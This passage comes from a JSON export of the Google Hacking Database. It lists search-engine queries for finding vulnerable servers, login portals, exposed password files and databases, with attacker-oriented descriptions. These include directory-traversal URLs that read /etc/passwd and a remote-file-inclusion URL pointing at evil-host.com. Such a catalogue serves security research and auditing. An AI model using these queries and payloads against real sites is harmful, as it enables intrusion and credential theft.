        "querystring": "http://www.google.com/search?q=inurl%3A%22index.php%3Fmodule%3Dew_filemanager%22", 
        "shortDescription": "inurl:\"index.php? module=ew_filemanager\"", 
        "textualDescription": "http://www.cirt.net/advisories/ew_file_manager.shtml:Product: EasyWeb FileManager Module - http://home.postnuke.ru/index.phpDescription: EasyWeb FileManager Module for PostNuke is vulnerable to a directory traversal problem which allows retrieval of arbitrary files from the remote system. Systems Affected: EasyWeb FileManager 1.0 RC-1Technical Description: The PostNuke module works by loading a directory and/or file via the \"pathext\" (directory) and \"view\" (file) variables. Providing a relative path (from the document repository) in the \"pathext\" variable will cause FileManager to provide a directory listing of that diretory. Selecting a file in that listing, or putting a file name in the \"view\" variable, will cause EasyWeb to load the file specified. Only files and directories which can be read by the system user running PHP can be retrieved.Assuming PostNuke is installed at the root level:/etc directory listing:/index.php?module=ew_filemanager&type=admin&func=manager&pathext=../../../etc/etc/passwd file:/index.php?module=ew_filemanager&type=admin&func=manager&pathext=../../../etc/&view=passwdFix/Workaround:Use another file manager module for PostNuke, as the authors do not appear to bemaintaining EW FileManager.Vendor Status: Vendor was contacted but did not respond.Credir: Sullo - cirt.netNOTE: mitigating factor, an attacker needs to be registred and logged on to have access rights to this module."
    }, 
    {
        "signatureReferenceNumber": "388", 
        "link": "https://www.exploit-db.com/ghdb/388/", 
        "category": "Vulnerable Servers", 
        "querystring": "http://www.google.com/search?q=allinurl:%22index.php%22+%22site=sglinks%22&num=100&start=100", 
        "shortDescription": "allinurl:\"index.php\" \"site=sglinks\"", 
        "textualDescription": "Easyins Stadtportal v4 is a German Content Management System for cities and regions. Version 4 and prior seems to be vulnerable to a code inclusion in index.php. Bugtraq: http://www.securityfocus.com/bid/10795http://www.host-vulnerable.com/stadtportal-path/index.php?site=http://www.evil-host.com"
    }, 
    {
        "signatureReferenceNumber": "389", 
        "link": "https://www.exploit-db.com/ghdb/389/", 
        "category": "Web Server Detection", 
        "querystring": "http://www.google.com/search?q=%22powered+by%22+%22shoutstats%22+hourly+daily&num=100&filter=0", 
        "shortDescription": "\"powered by\" \"shoutstats\" hourly daily", 
        "textualDescription": "shoutstats is a fast, free Shoutcast server statistic analysis program. It produces instant and dynamic usage reports in HTML format, for viewing in a standard browser. Shoutstats is a bunch of php scripts and a RRDtool database. It has been written under a Debian GNU/Linux.http://www.glop.org/projects/shoutstatsThis search can be used to find Shoutcast servers."
    }, 
    {
        "signatureReferenceNumber": "390", 
        "link": "https://www.exploit-db.com/ghdb/390/", 
        "category": "Web Server Detection", 
        "querystring": "http://www.google.com/search?q=intitle%3A%22Shoutcast+Administrator%22", 
        "shortDescription": "intitle:\"Shoutcast Administrator\"", 
        "textualDescription": "shoutcast is software for streaming mp3 and such. This search finds the administrator page. It can be used to detect unlisted Shoutcast servers."
    }, 
    {
        "signatureReferenceNumber": "391", 
        "link": "https://www.exploit-db.com/ghdb/391/", 
        "category": "Pages containing login portals", 
        "querystring": "http://www.google.com/search?q=inurl%3A%22utilities%2FTreeView.asp%22", 
        "shortDescription": "inurl:\"utilities/TreeView.asp\"", 
        "textualDescription": "From the marketing brochure: \"UltiPro Workforce Management offers you the most comprehensive and cost-effective HR and payroll solution on the market today.\"The default passwords are easy to guess if an employee has not logged into this system. An attacker would only need to find the loginname."
    }, 
    {
        "signatureReferenceNumber": "392", 
        "link": "https://www.exploit-db.com/ghdb/392/", 
        "category": "Files containing passwords", 
        "querystring": "http://www.google.com/search?num=100&q=filetype%3Apwl+pwl", 
        "shortDescription": "filetype:pwl pwl", 
        "textualDescription": "These are Windows Password List files and have been known to be easy to crack since the release of Windows 95. An attacker can use the PWLTools to decode them and get the users passwords. The following example has been provided:---Resource table: 0292 0294 0296 0298 (..etc..)File: C:\\Downloads\\2004-07\\07-26\\USER1.PWLUser name: 'USER1'Password: ''Dial-up:'*Rna\\Internet\\PJIU_TAC'Password:'PJIUSCAC3000' ---"
    }, 
    {
        "signatureReferenceNumber": "393", 
        "link": "https://www.exploit-db.com/ghdb/393/", 
        "category": "Network or vulnerability data", 
        "querystring": "http://www.google.com/search?hl=en&ie=UTF-8&q=%22apricot+-+admin%22+00h&btnG=Google+Search", 
        "shortDescription": "\"apricot - admin\" 00h", 
        "textualDescription": "This search shows the webserver access stats as the user \"admin\". The language used is Japanese and the search includes the \"00h\" value which is only shown when the admin is logged in."
    }, 
    {
        "signatureReferenceNumber": "394", 
        "link": "https://www.exploit-db.com/ghdb/394/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=filetype%3Aora+ora&btnG=Search", 
        "shortDescription": "filetype:ora ora", 
        "textualDescription": "Greetings, The *.ora files are configuration files for oracle clients. An attacker can identify a oracle database this way and get more juicy information by searching for ora config files.This search can be modified to be more specific:- filetype:ora sqlnet - filetype:ora names"
    }, 
    {
        "signatureReferenceNumber": "395", 
        "link": "https://www.exploit-db.com/ghdb/395/", 
        "category": "Vulnerable Files", 
        "querystring": "http://www.google.com/search?num=100&q=filetype%3Awsdl+wsdl&btnG=Search", 
        "shortDescription": "filetype:wsdl wsdl", 
        "textualDescription": "The XML headers are called *.wsdl files.they can include data, functions or objects. An attacker with knowledge of XML coding can sometimes do evil things with this stuff."
    }, 
    {
        "signatureReferenceNumber": "396", 
        "link": "https://www.exploit-db.com/ghdb/396/", 
        "category": "Vulnerable Files", 
        "querystring": "http://www.google.com/search?num=100&q=filetype%3Ainc+inc+intext%3Asetcookie", 
        "shortDescription": "filetype:inc inc intext:setcookie", 
        "textualDescription": "Cookies are often used for authentication and a lot of other stuff.The \"inc\" php header files often include the exact syntax of the cookies. An attacker may create his own cookie with the information he has taken from the header file and start cookie poisining."
    }, 
    {
        "signatureReferenceNumber": "397", 
        "link": "https://www.exploit-db.com/ghdb/397/", 
        "category": "Files containing passwords", 
        "querystring": "http://www.google.com/search?num=100&q=inurl%3A%2Fwwwboard", 
        "shortDescription": "inurl:/wwwboard", 
        "textualDescription": "The software wwwboard stores its passwords in a file called \"passwd.txt\".An attacker may try to search forinurl:/wwwboardthen add a \"passwd.txt\" to it (../wwwboard/passwd.txt) and decrypt des DES passwords."
    }, 
    {
        "signatureReferenceNumber": "398", 
        "link": "https://www.exploit-db.com/ghdb/398/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?num=100&q=%22allow_call_time_pass_reference%22+%22PATH_INFO%22", 
        "shortDescription": "\"allow_call_time_pass_reference\" \"PATH_INFO\"", 
        "textualDescription": "Returns publically visible pages generated by the php function phpinfo(). This search differs from other phpinfo() searches in that it doesn't depend on the filename being called \"phpinfo.php\". Some result files that include phpinfo are:"
    }, 
    {
        "signatureReferenceNumber": "399", 
        "link": "https://www.exploit-db.com/ghdb/399/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=inurl%3A%2Adb+filetype%3Amdb+", 
        "shortDescription": "inurl:*db filetype:mdb", 
        "textualDescription": "More Microsoft Access databases for your viewing pleasure. Results may vary, but there have been passwords discovered with this search."
    }, 
    {
        "signatureReferenceNumber": "400", 
        "link": "https://www.exploit-db.com/ghdb/400/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=filetype%3Afp5+fp5+-site%3Agov+-site%3Amil+-%22cvs+log%22&btnG=Search", 
        "shortDescription": "filetype:fp5 fp5 -site:gov -site:mil -\"cvs log\"", 
        "textualDescription": "These are various kinds of FileMaker Pro Databases (*.fp5 applies to both version 5 and 6)."
    }, 
    {
        "signatureReferenceNumber": "401", 
        "link": "https://www.exploit-db.com/ghdb/401/", 
        "category": "Advisories and Vulnerabilities", 
        "querystring": "http://www.google.com/search?q=inurl%3AgotoURL.asp%3Furl%3D", 
        "shortDescription": "inurl:gotoURL.asp?url=", 
        "textualDescription": "ASP Nuke is an open-source software application for running a community-based web site on a web server. By open-source, we mean the code is freely available for others to read, modify and use in accordance with the software license. The requirements for the ASP Nuke content management system are: 1. Microsoft SQL Server 2000 and 2. Microsoft Internet Information Server (IIS) 5.0 (http://www.aspnuke.com/)On 30 Dec. 2003 the hackers Cobac and Alnitak discovered a bug in Asp Nuke (version 1.2, 1.3, and 1.4)Problem : the file addurl-inc.asp included in the file gotourl.asp does not sanitize the input vars and make SQL injection possible.For a examples check the original advisory posted to a spanish forum: http://66.102.11.104/search?q=cache:10-ze5DIJ-UJ:www.elhacker.net/foro/index.php%3Ftopic%3D11830.0%3Bprev_next%3Dprev%22&hl=en(link broken in two lines, glue them together first :-)An attacker can obtain the user and admin passwords by crafting a SQL statement."
    }, 
    {
        "signatureReferenceNumber": "402", 
        "link": "https://www.exploit-db.com/ghdb/402/", 
        "category": "Various Online Devices", 
        "querystring": "http://www.google.com/search?q=intext%3Acentreware+inurl%3Astatus", 
        "shortDescription": "Phasers 4500/6250/8200/8400", 
        "textualDescription": "More Xerox printers (Phasers 4500/6250/8200/8400). An attacker can access the webinterface with this search."
    }, 
    {
        "signatureReferenceNumber": "403", 
        "link": "https://www.exploit-db.com/ghdb/403/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?num=100&q=filetype%3Afp3+fp3", 
        "shortDescription": "filetype:fp3 fp3", 
        "textualDescription": "These are FileMaker Pro version 3 Databases."
    }, 
    {
        "signatureReferenceNumber": "404", 
        "link": "https://www.exploit-db.com/ghdb/404/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?num=100&q=filetype%3Afp7+fp7", 
        "shortDescription": "filetype:fp7 fp7", 
        "textualDescription": "These are Filemaker Pro version 7 databases files."
    }, 
    {
        "signatureReferenceNumber": "405", 
        "link": "https://www.exploit-db.com/ghdb/405/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?q=filetype%3Acfg+auto_inst.cfg", 
        "shortDescription": "filetype:cfg auto_inst.cfg", 
        "textualDescription": "Mandrake auto-install configuration files. These contain information about the installed packages, networking setttings and even user accounts."
    }, 
    {
        "signatureReferenceNumber": "406", 
        "link": "https://www.exploit-db.com/ghdb/406/", 
        "category": "Pages containing login portals", 
        "querystring": "http://www.google.com/search?q=intitle%3ANode.List+Win32.Version.3.11", 
        "shortDescription": "intitle:Node.List Win32.Version.3.11", 
        "textualDescription": "synchronet Bulletin Board System Software is a free software package that can turn your personal computer into your own custom online service supporting multiple simultaneous users with hierarchical message and file areas, multi-user chat, and the ever-popular BBS door games.An attacker could use this search to find hosts with telnet access. In some cases the username may even be visible on the node list page, thus leaving only the password to guess."
    }, 
    {
        "signatureReferenceNumber": "407", 
        "link": "https://www.exploit-db.com/ghdb/407/", 
        "category": "Advisories and Vulnerabilities", 
        "querystring": "http://www.google.com/search?num=100&q=%22powered+by+antiboard%22", 
        "shortDescription": "\"powered by antiboard\"", 
        "textualDescription": "\"AntiBoard is a small and compact multi-threaded bulletin board/message board system written in PHP. It uses either MySQL or PostgreSQL as the database backend, and has support for different languages. It is not meant as the end all be all of bulletin boards, but rather something to easily integrate into your own page.\"There is an excellent vulnerability report at:http://www.securiteam.com/unixfocus/5XP010ADPY.htmlVendor Status:The vendor has been informed of the issues on the 28th July 2004, however no fix is planned in the near future."
    }, 
    {
        "signatureReferenceNumber": "408", 
        "link": "https://www.exploit-db.com/ghdb/408/", 
        "category": "Pages containing login portals", 
        "querystring": "http://www.google.com/search?num=100&q=%28inurl%3A%22ars%2Fcgi-bin%2Farweb%3FO%3D0%22+%7C+inurl%3Aarweb.jsp%29+-site%3Aremedy.com+-site%3Amil", 
        "shortDescription": "(inurl:\"ars/cgi-bin/arweb?O=0\" | inurl:arweb.jsp) -site:remedy.com -site:mil", 
        "textualDescription": "From the vendor site: \"Remedy\u00c3\u0192\u00c2\u00a2\u00c3\u00a2\u00e2\u20ac\u0161\u00c2\u00ac\u00c3\u00a2\u00e2\u20ac\u017e\u00c2\u00a2s Action Request System\u00c3\u0192\u00e2\u20ac\u0161\u00c3\u201a\u00c2\u00ae is for automating Service Management business processes. More than 7,000 customers know that AR System is the way to automate key business processes. AR System includes tools for application-to-application integration, including support for Web Services that requires no additional programming.\"Login is often 'guest' with no password. Or no login is required. An attacker can search the database for sensitive info (passwords), and search profiles to obtain usernames, emails."
    }, 
    {
        "signatureReferenceNumber": "409", 
        "link": "https://www.exploit-db.com/ghdb/409/", 
        "category": "Files containing passwords", 
        "querystring": "http://www.google.com/search?num=100&&q=%22AutoCreate%3DTRUE+password%3D*%22", 
        "shortDescription": "\"AutoCreate=TRUE password=*\"", 
        "textualDescription": "This searches the password for \"Website Access Analyzer\", a Japanese software that creates webstatistics. For those who can read Japanese, check out the author's site at: http://www.coara.or.jp/~passy/Note: google  to find the results of this software."
    }, 
    {
        "signatureReferenceNumber": "410", 
        "link": "https://www.exploit-db.com/ghdb/410/", 
        "category": "Sensitive Directories", 
        "querystring": "http://www.google.com/search?q=intext%3A%22d.aspx%3Fid%22+%7C%7C+inurl%3A%22d.aspx%3Fid%22", 
        "shortDescription": "intext:\"d.aspx?id\" || inurl:\"d.aspx?id\"", 
        "textualDescription": "\"The YouSendIt team was formed to tackle a common problem: secure transmission of large documents online without the use of clumsy client software, mail servers with limited storage space, and sharing passwords. By eliminating the size constraints and security risks of sending files by email, YouSendIt has turned the most common form of communication on the Internet into the best method of secure document transimssion.\"This search shows the files that were transmitted. A malicious user could download them from these pages. This company tends to hold the users responsible for content, while at the same time exposing their pages to Google.. way to go guys.."
    }, 
    {
        "signatureReferenceNumber": "411", 
        "link": "https://www.exploit-db.com/ghdb/411/", 
        "category": "Files containing passwords", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=filetype%3Apass+pass+intext%3Auserid&btnG=Search", 
        "shortDescription": "filetype:pass pass intext:userid", 
        "textualDescription": "Generally, these are dbman password files. They are not cleartext, but still allow an attacker to harvest usernames and optionally crack passwords offline."
    }, 
    {
        "signatureReferenceNumber": "412", 
        "link": "https://www.exploit-db.com/ghdb/412/", 
        "category": "Pages containing login portals", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=inurl%3A%2Fcgi-bin%2Fsqwebmail%3Fnoframes%3D1&btnG=Search", 
        "shortDescription": "inurl:/cgi-bin/sqwebmail?noframes=1", 
        "textualDescription": "sQWebmail login portals."
    }, 
    {
        "signatureReferenceNumber": "413", 
        "link": "https://www.exploit-db.com/ghdb/413/", 
        "category": "Files containing passwords", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=filetype%3Aini+ServUDaemon&btnG=Search", 
        "shortDescription": "filetype:ini ServUDaemon", 
        "textualDescription": "The servU FTP Daemon ini file contains setting and session information including usernames, passwords and more."
    }, 
    {
        "signatureReferenceNumber": "414", 
        "link": "https://www.exploit-db.com/ghdb/414/", 
        "category": "Advisories and Vulnerabilities", 
        "querystring": "http://www.google.com/search?q=inurl%3Acomersus_message.asp", 
        "shortDescription": "inurl:comersus_message.asp", 
        "textualDescription": "About Comercus: \"Comersus is an active server pages software for running a professional store, seamlessly integrated with the rest of your web site. Comersus Cart is free and it can be used for commercial purposes. Full source code included and compatible with Windows and Linux Servers.\"Comersus Open Technologies Comersus Cart has Multiple Vulnerabilities: http://www.securityfocus.com/bid/10674/info/ This search finds the XSS vulnerable file comersus_message.asp?message= ..No version info is included with the search. Not all results are vulnerable."
    }, 
    {
        "signatureReferenceNumber": "415", 
        "link": "https://www.exploit-db.com/ghdb/415/", 
        "category": "Pages containing login portals", 
        "querystring": "http://www.google.com/search?q=intitle%3A%22teamspeak+server-administration", 
        "shortDescription": "intitle:\"teamspeak server-administration", 
        "textualDescription": "TeamSpeak is an application which allows its users to talk to each other over the internet and basically was designed to run in the background of online games. TeamSpeak uses a webadmin login portal to change server settings remotely. Usually not an issue, however it might be when someone lets google pick up their portal."
    }, 
    {
        "signatureReferenceNumber": "416", 
        "link": "https://www.exploit-db.com/ghdb/416/", 
        "category": "Advisories and Vulnerabilities", 
        "querystring": "http://www.google.com/search?num=100&q=ext%3Apl+inurl%3Acgi+intitle%3A%22FormMail+*%22++-%22*Referrer%22+-%22*+Denied%22+-sourceforge+-error+-cvs+-input", 
        "shortDescription": "ext:pl inurl:cgi intitle:\"FormMail *\"  -\"*Referrer\" -\"* Denied\" -sourceforge -error -cvs -input", 
        "textualDescription": "FormMail is a Perl script written by Matt Wright to send mail with sendmail from the cgi-gateway. Early version didn' have a referer check. New versions could be misconfigured. Spammers are known to hunt them down (by means of cgi-scanning) and abuse them for their own evil purposes if the admin forgot to check the settings.http://www.securityfocus.com/bid/3954/discussion/"
    }, 
    {
        "signatureReferenceNumber": "417", 
        "link": "https://www.exploit-db.com/ghdb/417/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?num=100&q=%28inurl%3A%22robot.txt%22+%7C+inurl%3A%22robots.txt%22+%29+intext%3Adisallow+filetype%3Atxt", 
        "shortDescription": "(inurl:\"robot.txt\" | inurl:\"robots.txt\" ) intext:disallow filetype:txt", 
        "textualDescription": "Webmasters wanting to exclude search engine robots from certain parts of their site often choose the use of a robot.txt file on the root of the server. This file basicly tells the bot which directories are supposed to be off-limits.An attacker can easily obtain that information by very simply opening that plain text file in his browser. Webmasters should *never* rely on this for real security issues. Google helps the attacker by allowing a search for the \"disallow\" keyword."
    }, 
    {
        "signatureReferenceNumber": "418", 
        "link": "https://www.exploit-db.com/ghdb/418/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?q=intext:%22Session+Start+*+*+*+*:*:*+*%22+filetype:log&num=100", 
        "shortDescription": "intext:\"Session Start * * * *:*:* *\" filetype:log", 
        "textualDescription": "These are IRC and a few AIM log files. They may contain juicy info or just hours of good clean newbie bashing fun."
    }, 
    {
        "signatureReferenceNumber": "419", 
        "link": "https://www.exploit-db.com/ghdb/419/", 
        "category": "Pages containing login portals", 
        "querystring": "http://www.google.com/search?q=%22WebSTAR+Mail+-+Please+Log+In%22", 
        "shortDescription": "\"WebSTAR Mail - Please Log In\"", 
        "textualDescription": "@stake, Inc. advisory: \"4D WebSTAR is a software product that provides Web, FTP, and Mail services for Mac OS X.  There are numerous vulnerabilities that allow for an attacker to escalate privileges or obtain access to protected resources.\"See also: http://www.securityfocus.com/archive/1/368778"
    }, 
    {
        "signatureReferenceNumber": "420", 
        "link": "https://www.exploit-db.com/ghdb/420/", 
        "category": "Pages containing login portals", 
        "querystring": "http://www.google.com/search?q=filetype%3Acfg+login+%22LoginServer%3D%22", 
        "shortDescription": "Ultima Online loginservers", 
        "textualDescription": "This one finds login servers for the Ultima Online game."
    }, 
    {
        "signatureReferenceNumber": "421", 
        "link": "https://www.exploit-db.com/ghdb/421/", 
        "category": "Files containing passwords", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=inurl%3Anuke+filetype%3Asql&btnG=Search", 
        "shortDescription": "inurl:nuke filetype:sql", 
        "textualDescription": "This search reveals database dumps that most likely relate to the php-nuke or postnuke content management systems. These database dumps contain usernames and (sometimes) encrypted passwords for users of the system."
    }, 
    {
        "signatureReferenceNumber": "422", 
        "link": "https://www.exploit-db.com/ghdb/422/", 
        "category": "Pages containing login portals", 
        "querystring": "http://www.google.com/search?num=50&q=intitle%3A%22please+login%22+%22your+password+is+*%22", 
        "shortDescription": "intitle:\"please login\" \"your password is *\"", 
        "textualDescription": "These administrators were friendly enough to give hints about the password."
    }, 
    {
        "signatureReferenceNumber": "423", 
        "link": "https://www.exploit-db.com/ghdb/423/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?q=mail+filetype%3Acsv+-site%3Agov+intext%3Aname", 
        "shortDescription": "mail filetype:csv -site:gov intext:name", 
        "textualDescription": "CSV Exported mail (user) names and such."
    }, 
    {
        "signatureReferenceNumber": "424", 
        "link": "https://www.exploit-db.com/ghdb/424/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=filetype%3Axls+-site%3Agov+inurl%3Acontact&btnG=Search", 
        "shortDescription": "filetype:xls -site:gov inurl:contact", 
        "textualDescription": "Microsoft Excel sheets containing contact information."
    }, 
    {
        "signatureReferenceNumber": "425", 
        "link": "https://www.exploit-db.com/ghdb/425/", 
        "category": "Vulnerable Servers", 
        "querystring": "http://www.google.com/search?q=intext:%22Warning:+*+am+able+*+write+**+configuration+file%22+%22includes/configure.php%22+-Forums&num=100&hl=en&lr=&ie=UTF-8&safe=off&start=0&sa=N", 
        "shortDescription": "intext:\"Warning: * am able * write ** configuration file\" \"includes/configure.php\" -Forums", 
        "textualDescription": "OsCommerce has some security issues, including the following warning message: \"Warning: I am able to write to the configuration file\". Additional information on this can be found at http://www.fluxforums.com/showthread.php?p=14883#post14883With this search an attacker can find vulnerable OsCommerce servers and can build his attack from there."
    }, 
    {
        "signatureReferenceNumber": "426", 
        "link": "https://www.exploit-db.com/ghdb/426/", 
        "category": "Pages containing login portals", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=inurl%3Acgi-bin%2Fultimatebb.cgi%3Fubb%3Dlogin&btnG=Search", 
        "shortDescription": "inurl:cgi-bin/ultimatebb.cgi?ubb=login", 
        "textualDescription": "These are login pages for Infopop's message board UBB.classic. For the UBB.threads you can use this search This next search finds all UBB pages with the infopop image and a link to the developers.http://www.google.com/search?num=100&&safe=off&q=link%3Ahttp%3A%2F%2Fwww.infopop.com%2Flanding%2Fgoto.php%3Fa%3Dubb.classic&filter=1"
    }, 
    {
        "signatureReferenceNumber": "427", 
        "link": "https://www.exploit-db.com/ghdb/427/", 
        "category": "Files containing passwords", 
        "querystring": "http://www.google.com/search?q=inurl%3A%2Fdb%2Fmain.mdb", 
        "shortDescription": "inurl:/db/main.mdb", 
        "textualDescription": "ASP-Nuke database file containing passwords.This search goes for the direct location and has few results. For more hits an attacker would try to find ASP-Nuke sites another way (search googledorks for them) and change the URL to the database location."
    }, 
    {
        "signatureReferenceNumber": "428", 
        "link": "https://www.exploit-db.com/ghdb/428/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?q=ext%3Aasp+inurl%3Apathto.asp", 
        "shortDescription": "ext:asp inurl:pathto.asp", 
        "textualDescription": "The UBB trial version contains files that are not safe to keep online after going live. The install files clearly state so:CAUTIONS Do not leave pathto.asp or ubb6_test.cgi on your server. Delete them from the server when you are done. Leaving them in place poses a security risk.\"This searches pathto.asp files and allows an attacker to know the exact installed path of the software.Examples:The path to your Site is -- g:\\0E5\\goldenstateeng.xxx\\webThe path to your Site is -- D:\\inetpub\\wwwroot\\01xx738\\mc10s9izz"
    }, 
    {
        "signatureReferenceNumber": "429", 
        "link": "https://www.exploit-db.com/ghdb/429/", 
        "category": "Vulnerable Files", 
        "querystring": "http://www.google.com/search?q=ext%3Acgi+inurl%3Aubb6_test.cgi", 
        "shortDescription": "ext:cgi inurl:ubb6_test", 
        "textualDescription": "The UBB trial version contains files that are not safe to keep online after going live. The install files clearly state so:CAUTIONS Do not leave pathto.asp or ubb6_test.cgi on your server. Delete them from the server when you are done. Leaving them in place poses a security risk.\"This is the UBB6 Permissions & Paths Diagnostic Script.Example:UBB Version  \t6.1.0.3  Perl Version \t5.006 Server Type \tApache/1.3.27 (Unix) (Red-Hat/Linux) mod_fastcgi/2.2.10 mod_jk/1.2.0 mod_perl/1.24_01 PHP/4.2.2 FrontPage/5.0.2 mod_ssl/2.8.12 OpenSSL/0.9.6b  check path: \t1. \tcheck permission to write new files in this directory2. \tcheck for the 'required' files in both the CGI and this directory3. \tcheck my read/write permissions on all the variables files4. \tcheck my absolute paths in general settings if available  \tversion 2.1 \t\u00c3\u0192\u00e2\u20ac\u0161\u00c3\u201a\u00c2\u00a9 2001 Infopop Corporation All Rights Reserved"
    }, 
    {
        "signatureReferenceNumber": "430", 
        "link": "https://www.exploit-db.com/ghdb/430/", 
        "category": "Network or vulnerability data", 
        "querystring": "http://www.google.com/search?q=%22this+proxy+is+working+fine!%22+%22enter+*%22+%22URL***%22+*+visit&num=100&filter=0", 
        "shortDescription": "\"this proxy is working fine!\" \"enter *\" \"URL***\" * visit", 
        "textualDescription": "These are test pages for some proxy program. Some have a text field that allows you to use that page as a proxy. The experts comment on this is there are much better solutions for surfing anonymously."
    }, 
    {
        "signatureReferenceNumber": "431", 
        "link": "https://www.exploit-db.com/ghdb/431/", 
        "category": "Files containing passwords", 
        "querystring": "http://www.google.com/search?hl=en&ie=UTF-8&q=filetype%3Abak+inurl%3A%22htaccess%7Cpasswd%7Cshadow%7Chtusers%22&filter=0", 
        "shortDescription": "filetype:bak inurl:\"htaccess|passwd|shadow|htusers\"", 
        "textualDescription": "This will search for backup files (*.bak) created by some editors or even by the administrator himself (before activating a new version). Every attacker knows that changing the extenstion of a file on a webserver can have ugly consequences."
    }, 
    {
        "signatureReferenceNumber": "432", 
        "link": "https://www.exploit-db.com/ghdb/432/", 
        "category": "Files containing passwords", 
        "querystring": "http://www.google.com/search?safe=off&q=%22http%3A%2F%2F*%3A*%40www%22+bob%3Abob&num=100", 
        "shortDescription": "\"http://*:*@www\" domainname", 
        "textualDescription": "This is a query to get inline passwords from search engines (not just Google), you must type in the query followed with the the domain name without the .com or .net\"http://*:*@www\" bangbus or \"http://*:*@www\"bangbusAnother way is by just typing\"http://bob:bob@www\""
    }, 
    {
        "signatureReferenceNumber": "433", 
        "link": "https://www.exploit-db.com/ghdb/433/", 
        "category": "Error Messages", 
        "querystring": "http://www.google.com/search?hl=en&ie=UTF-8&q=filetype%3Alog+%22PHP+Parse+error%22+%7C+%22PHP+Warning%22+%7C+%22PHP+Error%22", 
        "shortDescription": "filetype:log \"PHP Parse error\" | \"PHP Warning\" | \"PHP Error\"", 
        "textualDescription": "This search will show an attacker some PHP error logs wich may contain information on wich an attack can be based."
    }, 
    {
        "signatureReferenceNumber": "434", 
        "link": "https://www.exploit-db.com/ghdb/434/", 
        "category": "Pages containing login portals", 
        "querystring": "http://www.google.com/search?num=100&hl=en&lr=&safe=off&q=%22powered+by+CuteNews%22+%222003..2005+CutePHP%22&btnG=Search", 
        "shortDescription": "\"powered by CuteNews\" \"2003..2005 CutePHP\"", 
        "textualDescription": "This finds sites powered by various CuteNews versions. An attacker use this list and search the online advisories for vulnerabilities. For example: \"CuteNews HTML Injection Vulnerability Via Commentaries\", Vulnerable Systems: * CuteNews version 1.3.x (http://www.securiteam.com/unixfocus/5BP0N20DFA.html)"
    }, 
    {
        "signatureReferenceNumber": "435", 
        "link": "https://www.exploit-db.com/ghdb/435/", 
        "category": "Web Server Detection", 
        "querystring": "http://www.google.com/search?q=intext%3A%22404+Object+Not+Found%22+Microsoft-IIS%2F5.0", 
        "shortDescription": "intext:\"404 Object Not Found\" Microsoft-IIS/5.0", 
        "textualDescription": "This search finds IIS 5.0 error pages = IIS 5.0 Server"
    }, 
    {
        "signatureReferenceNumber": "436", 
        "link": "https://www.exploit-db.com/ghdb/436/", 
        "category": "Files containing passwords", 
        "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=filetype%3Aconf+oekakibbs+&btnG=Search", 
        "shortDescription": "filetype:conf oekakibbs", 
        "textualDescription": "Oekakibss is a japanese anime creation application. The config file tells an attacker the encrypted password."
    }, 
    {
        "signatureReferenceNumber": "437", 
        "link": "https://www.exploit-db.com/ghdb/437/", 
        "category": "Pages containing login portals", 
        "querystring": "http://www.google.com/search?num=100&&q=Novell+NetWare+intext%3A%22netware+management+portal+version%22", 
        "shortDescription": "Novell NetWare intext:\"netware management portal version\"", 
        "textualDescription": "Netware servers ( v5 and up ) use a web-based management utility called Portal services, which can be used to view files on a volume, view server health statistics, etc. While you must log into the Portal Manager to view any of the data, it will accept blank passwords. So any Netware username defined in the server's NDS database w/o a password can authenticate.After the Google results are displayed, an attacker wil go to the company base web url and learn about employees, preferably their email addresses. Then bounce to the portal management login and try their username w/o a password."
    }, 
    {
        "signatureReferenceNumber": "438", 
        "link": "https://www.exploit-db.com/ghdb/438/", 
        "category": "Advisories and Vulnerabilities", 
        "querystring": "http://www.google.com/search?q=inurl:%22dispatch.php%3Fatknodetype%22+%7C++inurl:class.atkdateattribute.js.php&num=100&filter=0", 
        "shortDescription": "Achievo webbased project management", 
        "textualDescription": "Achievo is a free web-based project management tool for business-environments. Achievo's is mainly used for its project management capabilities. According to the site securitytracker.com remote code execution is possible by modifying a certain php script in this software suite. More information is available at: http://www.securitytracker.com/alerts/2002/Aug/1005121.html"
    }, 
    {
        "signatureReferenceNumber": "439", 
        "link": "https://www.exploit-db.com/ghdb/439/", 
        "category": "Vulnerable Files", 
        "querystring": "http://www.google.com/search?num=100&q=intitle%3A%22PHP+Explorer%22+ext%3Aphp+%28inurl%3Aphpexplorer.php+%7C++inurl%3Alist.php+%7C+inurl%3Abrowse.php%29", 
        "shortDescription": "intitle:\"PHP Explorer\" ext:php (inurl:phpexplorer.php |  inurl:list.php | inurl:browse.php)", 
        "textualDescription": "This searches for PHP Explorer scripts. This looks like a file manager with some nice extra options for an attacker, such as phpinfo, create/list directories and execute command shell. Not many results in this search and some only cached. Over time this may prove to be interesting if Google finds more (or someone finds a better search method for them)."
    }, 
    {
        "signatureReferenceNumber": "440", 
        "link": "https://www.exploit-db.com/ghdb/440/", 
        "category": "Vulnerable Servers", 
        "querystring": "http://www.google.com/search?hl=en&ie=UTF-8&q=%22ftp%3A%2F%2F%22+%22www.eastgame.net%22+&btnG=Google+Search", 
        "shortDescription": "\"ftp://\" \"www.eastgame.net\"", 
        "textualDescription": "Use this search to find eastgame.net ftp servers, loads of warez and that sort of thing.\"thankyou4share\" !"
    }, 
    {
        "signatureReferenceNumber": "441", 
